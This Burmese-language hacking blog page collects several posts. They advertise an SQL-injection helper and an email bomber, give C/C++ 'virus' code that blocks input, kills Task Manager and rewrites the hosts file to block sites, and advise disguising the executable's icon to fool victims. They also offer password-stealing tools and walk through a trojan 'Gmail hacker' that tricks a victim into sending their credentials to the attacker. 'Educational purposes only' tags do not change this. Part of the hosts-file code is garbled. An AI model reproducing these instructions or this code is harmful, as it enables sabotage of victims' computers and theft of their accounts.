ဒီ program ကိုတော့ AlphaDog က ဖန်တီးခဲ့တာဖြစ်ပြီး ဒီ browser ဟာ IE ပေါ်မှာ အခြေခံပြုလုပ်ထားတာဖြစ်ပါတယ်။ web searcher တွေထဲတစ်ခုကို လျင်မြန်စွာ ရွေးချယ်နိုင်ပါတယ် :
-Google
-Yahoo
-You tube
-AOL
-Alta vista
-All the web
-Bing
-Ask
-Anime Freak xD
-Verizon ...

၎င်းမှာ SQL helper လို့ခေါ်တဲ့ ကဏ္ဍတစ်ခုပါဝင်ပြီး ၄င်းက အနည်းဆုံးတော့ သင် site တွေကို inject လုပ်နေတဲ့အခါတွေမှာ ကူညီပေးနိုင်ပါတယ်။
ပြီးတော့ ၄င်းမှာ hackခဲ့ပြီးသား Gmail တွေပါဝင်တဲ့ Email bomber ရှိပါတယ်။
နောက်ပြီး ကောင်းမွန်တဲ့ SQL နဲ့ RFL section တွေရှိပါတယ်။ ဒါကြောင့်သင်ဟာ vunl siteတွေကို ရှာဖွေနိုင်ပါတယ်။ ( မူလ image size အတိုင်းကြည့်ချင်ရင် ပုံကို click ပါ။)

စတင်လေ့လာသူများအတွက် C++ Virus Guide (၂)

အရင် post မှာ တော်တော်လေး ရှင်းခဲ့ပြီးပါပြီ... ဒီ post မှာတော့ payload အပိုင်းနဲ့ taskmanager ပေါ်မလာအောင်လို့ ဘယ်လိုလုပ်မလဲဆိုတာကို တင်ပေးထားပါတယ်။ ဒီ post ကိုမဖတ်ခင်မှာ စတင်လေ့လာသူများအတွက် C++ Virus Guide ကိုအရင်ဖတ်ဖို့ လိုမယ်ထင်ပါတယ်...ဘာလို့လဲဆိုတော့ အဲဒီ post က C++ Virus ရေးသားနည်းအတွက် အခြေခံမို့လို့ပါ။

အောက်မှာပြထားတဲ့ code ကတော့ သင့်computer ရဲ့ beep ထွက်လာအောင်ပြုလုပ်နိုင်ပါတယ်...

int Freq = 100;
int Duration = 100;
Beep(Freq,Duration);

အခုအောက်မှာ ထပ်ပြထားတဲ့ code တွေကတော့ beep တွေကို ထပ်ခါထပ်ခါ ထွက်လာစေပြီး ဆူညံသွားအောင် ဖန်တီးနိုင်ပါတယ်။

while(1==1)
{Beep(Freq,Duration);}
}

အပေါ်မှာ ဖော်ပြထားတဲ့ code တွေနဲ့ ယှဉ်တွဲပြီး လေ့လာနိုင်အောင် စိတ်ညစ်စရာကောင်းတဲ့ ဆူဆူညံညံအသံတွေကို ဖန်တီးနိုင်တဲ့ virus sample တစ်ခုကို အောက်မှာပေးထားပါတယ်...download ယူပြီးကြည့်နိုင်ပါတယ်။ .cpp နဲ့ save ထားတာဖြစ်လို့ အန္တရာယ်မဖြစ်နိုင်ပါဘူး။

ဆူဆူညံညံအသံတွေထွက်အောင် လုပ်နိုင်တာတော့ ဟုတ်ပါပြီ... ကျနော်တို့ရဲ့ virus program ကို virus တိုက်ခိုက်ခံရတဲ့ သူက ရပ်တန့်သွားအောင် လုပ်လို့မရအောင် ဘယ်လိုလုပ်မလဲ...?
အဖြေကတော့ - BlockInput();
BlockInput() ဟာ ပြဿနာလေးတစ်ခုရှိနေတာက လွဲရင်အဆင်ပြေပါတယ်... ဘာပြဿနာလဲဆိုတော့ user က CTRL + ALT + DEL keyတွေကို နှိပ်ပြီး taskmanager ကိုဖွင့်ပြီး ကျနော်တို့ရဲ့ program ကို ရပ်တန့်နိုင်ပါသေးတယ်...input နှစ်ခုလုံးကို ရပ်တန့်သွားစေဖို့အတွက်ကတော့....

#include <winable.h> //must have for BlockInput
//အရင်C++ Virus Guide မှာလေ့လာခဲ့ရတဲ့ code တွေကို ဒီနေရာမှာထည့်ပါ။

hWin = FindWindow(NULL,"Windows Task Manager"); //checks to make sure taskmgr isnt opened
SendMessage(hWin,WM_CLOSE,(LPARAM)0,(WPARAM)0); // if taskmgr is open it will close

BlockInput(true);
cout << "Your Input Is Blocked" <<endl;
Sleep(10000); //pauses for 10 seconds
BlockInput(false);
cout << "Your Input Is Unblocked" <<endl;

}

အခုအပေါ်မှာပြထားတဲ့ code တွေကို compile လုပ်ပြီး run လိုက်မယ်ဆိုရင် 10 seconds လောက်တော့ သင့်ရဲ့ mouse ကိုရွှေ့လို့ရတော့မှမဟုတ်သလို keyboard ကနေလည်း ဘာမှရိုက်လို့မရတော့ပါဘူး။

သင့်ရဲ့ C++ virus ကို full screen လုပ်ချင်တယ်ဆိုရင်တော့ ... အောက်က code တွေကိုလေ့လာကြည့်ပါ...

#include <iostream>
using namespace std;

#include <windows.h>

#include <conio.h>

class Program {
public:
void Fullscreen();
};

int main()
{
Program start;
start.Fullscreen();
cout<<"This is a full-screen C++ application!!";
getch();
return 0;
}

void Program::Fullscreen()
{
keybd_event (VK_MENU, 0x38, 0, 0);
keybd_event (VK_RETURN, 0x1c, 0, 0);
keybd_event (VK_RETURN, 0X1c, KEYEVENTF_KEYUP, 0);
keybd_event (VK_MENU, 0x38, KEYEVENTF_KEYUP, 0);
}

ဒီလောက်ဆိုရင်တော့ အဆင်ပြေလောက်မယ်ထင်ပါတယ်...နောက်ထပ် virus sample တွေကိုထပ်တင်ပေးပါအုံးမယ်...။

(Educational Purposes Only)

block the website by the virus code

Websites ကို Block လုပ်တဲ့ Virus

Website ကို Block လုပ်တဲ့ Virus နဲ့ ပတ်သက်ပြီး တော်တော်များများ သိပြီးကြလောက်ပြီထင်ပါတယ်... ဒါပေမယ့် မသိသေးတဲ့ သူတွေအတွက် လေ့လာလို့ ရအောင်ပါ။ ဒီ Virus ကိုလည်း C programming Language နဲ့ ဖန်တီးထားတာဖြစ်ပါတယ်။ C နဲ့ ပတ်သက်တဲ့ Basic knowledge ရှိမယ်ဆိုရင် ဒီ Virus ရဲ့ အလုပ်လုပ်ပုံကို နားလည်ပါလိမ့်မယ်။ တိုက်ခိုက်ခံရသူအနေနဲ့ ဒီ Virus ကို တစ်ကြိမ်တော့ Click လုပ်ဖို့လိုအပ်ပါတယ်။ တစ်ကြိမ် Click လိုက်ပြီးတာနဲ့ ဒီ Virus source code ထဲမှာ သတ်မှတ်ပေးထားတဲ့ Website တွေကို block လုပ်ပါလိမ့်မယ်။ တကယ်လို့ တိုက်ခိုက်ခံရသူအနေနဲ့ operation system ကို re-install လုပ်မယ်ဆိုရင်တောင် အခု ဒီ Virus ကနေ Block ထားတဲ့ Website တွေကို ဖွင့်လို့ရတော့မှာ မဟုတ်ပါဘူး။ IE နဲ့ Firefox browser တွေကလည်း ဒီ Virus ရဲ့ Blocking ကို ကန့်သတ်ထားနိုင်ခြင်း မရှိတဲ့ အတွက် ဒီ Virus နဲ့ Block ထားတဲ့ Website တွေကို ဘယ် Web Browser နဲ့ဖွင့်ဖွင့် ပေါ်လာတော့မှာမဟုတ်ပါဘူး...။

ဒါကတော့ Virus ရဲ့ Source Code တွေဖြစ်ပါတယ်.....

#include<stdio.h>
#include<dos.h>
#include<dir.h>

char site_list[6][30]={
"google.com",
"www.google.com",
"youtube.com",
"www.youtube.com",
"yahoo.com",
"www.yahoo.com"
};
char ip[12]="127.0.0.1″;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst("C:\\windows\\system32\\drivers\\etc\\hosts",&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen("C:\\windows\\system32\\drivers\\etc\\hosts","r+");
/*to open the file*/
return 1;
}

done=findfirst("D:\\windows\\system32\\drivers\\etc\\hosts",&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen("D:\\windows\\system32\\drivers\\etc\\hosts","r+");
/*to open the file*/
return 1;
}

done=findfirst("E:\\windows\\system32\\drivers\\etc\\hosts",&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen("E:\\windows\\system32\\drivers\\etc\\hosts","r+");
/*to open the file*/
return 1;
}

done=findfirst("F:\\windows\\system32\\drivers\\etc\\hosts",&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen("F:\\windows\\system32\\drivers\\etc\\hosts","r+");
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,"\n");
for(i=0;i<6;i++) success="0;" success="find_root();">

အခုအပေါ်မှာပြထားတဲ့ Source Code ကို Note pad ထဲမှာ ကူးထည့်ပြီး .c (သို့) .cpp နဲ့ save ပြီး compile လုပ်ဖို့လိုပါတယ်။ ( အဆင့်ဆင့်ကို C programs ကို ဘယ်လို Compile လုပ်မလဲ ဆိုတဲ့ post တွင်ကြည့်ပါ။ )

ဒီ Virus ကို စမ်းသပ်ကြည့်ဖို့အတွက်ကတော့...

(၁) Compile လုပ်ပြီးတဲ့အခါ block_Site.exe ( ဖိုင် name ကတော့ ကြိုက်သလိုပေးနိုင်ပါတယ်...)ကို တစ်ကြိမ် run လိုက်ပါ ။ ပြီးရင် browser program ကို restart လုပ်လိုက်ပါ... ပြီးရင် ဒီ Virus ထဲမှာ ပါဝင်တဲ့ website တွေရဲ့ URL ကို ရိုက်ထည့်ပြီး ဖွင့်ကြည့်ပါ... Browser က "Page cannot displayed" ဆိုတဲ့ error ကို ပြပါလိမ့်မယ်...။

(၂) ဒီ Virus ကို ပြန်ဖြုတ်ဖို့အတွက်ကတော့ Run ထဲမှာ %windir%\system32\drivers\etc ကို type ပြီး ဖွင့်လိုက်ပါ။ ပြီးရင် အဲဒီထဲမှာ ဖိုင် name "hosts" ဆိုတဲ့ ဖိုင်တွေကို ရှာပြီး notepad နဲ့ဖွင့်ကြည့်ပါ။ ဖိုင်ထဲမှာ ...
127.0.01 ------------- google.com
ကဲ့သို့သော IP adress နဲ့ website URL ပါတာတွေကို တွေ့ရပါလိမ့်မယ်။ အခုလို ပါဝင်တဲ့ ဖိုင်တွေအားလုံးကို Delete လုပ်လိုက်ပါ ။

တိုက်ခိုက်ခံရသူတွေ ထင်ယောင်ထင်မှားဖြစ်အောင် EXE ဖိုင်ရဲ့ Icon ပုံစံကို ပြောင်းလဲဖို့ လိုပါလိမ့်မယ်။ ( EXE ဖိုင်ရဲ့ icon ပုံစံကို ဘယ်လိုပြောင်းမလဲ ဆိုတဲ့ Post မှာကြည့်ပါ... )

(Educational Purposes Only )

password hacker

PASSWORD HACKER

Password တွေကို hack ချင်သူများအတွက် အနည်းနဲ့ အများတော့ အသုံးဝင်ပါတယ်... ဒီထဲမှာပါဝင်တဲ့ softwareများ ရဲ့ Featureတွေကို rar ထဲမှာရှိတဲ့ read me file ထဲမှာ ဖတ်ရှုနိုင်ပါတယ်။ အထဲမှာ Serial key လည်း ပါဝင်ပါတယ်။

ပါဝင်တာတွေကတော့ ...
Netscape password hacker
mozilla firefox password hacker
e-m ail id collector
e-mail id password hacker 2.5 V yahoo gmail rediff and hotmail only
orkut idhacker
Password ******* :
e-mail password hacker,
website *******
network password revealers full versions
password remember for netscape revealer !
password gatherer
password recoverer

(Educational Purposes Only)

gmail hacking way

Gmail Hacker Software

Blogလည်ထွက်ရင်းနဲ့ သိခဲ့တာလေးကို ဖောက်သည်ချချင်လို့ပါ။ သိတဲ့သူတွေတော့ များပါတယ်... မသိသေးသူများအတွက်ပါ။ ဆိုလိုတာက ဒီလိုလေးတွေလည်း လုပ်တတ်တယ်... ဒါကြောင့် ကိုယ့် Password လေးပါမသွားချင်ရင် သတိထားလို့ ရအောင်ပါ။ ဒါလည်း Educational Purpose အတွက်ပါပဲ။
ခေါင်းစဉ်မှာရေးထားတဲ့အတိုင်းပဲ Gmail Hacker Software ပါ။

၁။ အဲဒါလေးကို download ချပြီး Gmail Hacker Builder.exe file ကို သင့်ကွန်ပြူတာမှ run ရပါတယ်။ အဲဒီအခါ အခု အောက်ကပုံထဲမှာလိုပေါ်လာပါလိမ့်မယ်။

၂။ အဲဒီနောက် သင်ရဲ့ Email address နဲ့ password ( အသစ်ပြုလုပ်ထားတဲ့ Gmail ID ဖြစ်သင့်ပါတယ် ) ကို ရိုက်ထည့်လိုက်ပြီး Build ဆိုတာကို click ရပါတယ်။ အဲဒီနောက်မှာ Gmail hacker builder ကနေပြီး သင့်အတွက် Gmail hacker application တစ်ခုဖန်တီးပေးပါလိမ့်မယ်။ အဲဒီ Gmail Hacker.exe file ကို သင် gmail password hack ဖို့အတွက်အသုံးပြုရမှာဖြစ်ပါတယ်။

၃။ ဒီအဆင့်မှာတော့ ခုနကရလာတဲ့ Gmail Hacker.exe file ကို သင် hack ချင်တဲ့ လူဆီကို " ဒီ Gmail hacker က Gmail password တွေကို hack ဖို့အတွက် သုံးလို့ရတယ်" လို့ပြောပြီးပို့ရမှာဖြစ်ပါတယ်။ ပြီးတော့ ဒီ Gmail Hacker ထဲကို သူရဲ့ Gmail ID , Password နဲ့ သူ hack ချင်တဲ့ သူရဲ့ Gmail ID ကိုရိုက်ထည့်ဖို့ပြောပါ။( .EXE file ကို Gmail ကနေပို့ချင်ရင် Win RAR နဲ့ ချုပ်ပြီးပို့လို့ရပါတယ်။)

၅။ သင် hack ချင်တဲ့ လူက information တွေကို ရိုက်ထည့်လိုက်ပြီး Hack Them ဆိုတာကို click လိုက်ရင် အောက်ပါ error message တစ်ခု သူ့ကိုပြပါလိမ့်မယ်။

၆။ တဘက်မှာလည်း သင့်ရဲ့ Email account ထဲကို အောက်က ပုံထဲမှာလို Email တစ်စောင်ရောက်ရှိလာမှာ ဖြစ်ပါတယ်။

ဒါဆိုရင်တော့ Gmail password hack တာ အောင်မြင်သွားပါပြီ။ဒီ hacking မှာအဓိကအချက်ကတော့ ကိုယ် hack ချင်တဲ့ လူဆီကို Gmail Hacker.exe file ရောက်သွားဖို့နဲ့ အဲဒီထဲကို သူ့ရဲ့ User name နဲ့ Password ရိုက်ထည့်ဖြစ်သွားဖို့ပါပဲ။ အဲဒီအဆင့် ကိုကျော်လွှားနိုင်ရင် password hack တာအောင်မြင်သွားပါပြီ။ အောက်မှာ ဒီ Software အတွက် download ပါ။

ဒီလိုနည်းတွေ အများကြီးရှိပါသေးတယ်..အခါအခွင့်သင့်ရင် တင်ပေးပါ့မယ်။

(Educational Purposes Only)

တခြားအကြောင်းအရာလေးတွေ